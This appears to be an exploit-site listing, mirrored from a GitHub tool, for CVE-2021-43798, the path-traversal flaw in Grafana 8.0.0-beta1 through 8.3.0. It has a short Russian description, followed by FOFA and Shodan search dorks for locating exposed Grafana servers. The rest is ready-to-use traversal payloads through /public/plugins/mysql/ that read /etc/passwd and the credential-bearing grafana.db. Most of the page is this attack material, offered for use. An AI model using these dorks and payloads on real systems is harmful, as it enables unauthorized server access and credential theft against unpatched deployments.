Sploitus

Exploit for CVE-2021-43798

kitploit · 2026-08-31

Exploit Code

MARKDOWN12 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-0XF3D0RQ-CVE-2021-43798
# CVE-2021-43798

CVE-2021-43798 — это уязвимость обхода пути высокой степени серьезности (оценка CVSS 3.1: 7.5), затрагивающая Grafana версии с 8.0.0-beta1 по 8.3.0. Она позволяет неаутентифицированным злоумышленникам читать произвольные файлы с сервера, используя недостаточную очистку в конечной точке /public/plugins/:pluginId.

dork :

fofa : title="Grafana" && port="3000" shodan : http.title:"Grafana" port:3000

payload :

/public/plugins/mysql/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd /public/plugins/mysql/../../../../../../../../../../../../etc/passwd /public/plugins/mysql/../../../../../../../../../../../../var/lib/grafana/grafana.db /public/plugins/mysql/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Flib%2Fgrafana%2Fgrafana.db